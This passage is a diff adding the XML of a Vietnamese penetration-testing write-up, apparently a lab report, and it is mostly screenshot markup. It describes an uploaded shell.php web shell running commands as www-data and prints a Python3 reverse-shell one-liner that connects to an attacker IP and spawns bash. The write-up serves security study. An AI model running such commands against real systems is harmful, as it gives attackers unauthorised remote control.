+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2711450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Kết quả là file shell.php đã được tạo thành công, ta sẽ thử thực hiện lệnh id qua tham số cmd để kiểm tra:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD8E4A5" wp14:editId="22757B63">
+            <wp:extent cx="5943600" cy="2704465"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2704465"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Kết quả trả về là id của user www-data. Tiếp theo, ta sẽ tạo reverse shell thông qua file shell.php này.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Đầu tiên, ta sẽ thực hiện netcat trên máy attacker:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D10CA67" wp14:editId="58318950">
+            <wp:extent cx="4467849" cy="2438740"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="10" name="Picture 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4467849" cy="2438740"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ta sẽ sử dụng Python3 để tạo reverse shell:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.17.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77236BC6" wp14:editId="701F9924">
+            <wp:extent cx="5943600" cy="2334895"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="12" name="Picture 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2334895"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Trên máy attacker, ta đã thành công lấy được shell:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E42CCC3" wp14:editId="63B64F7F">
+            <wp:extent cx="5430008" cy="1524213"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="13" name="Picture 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5430008" cy="1524213"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
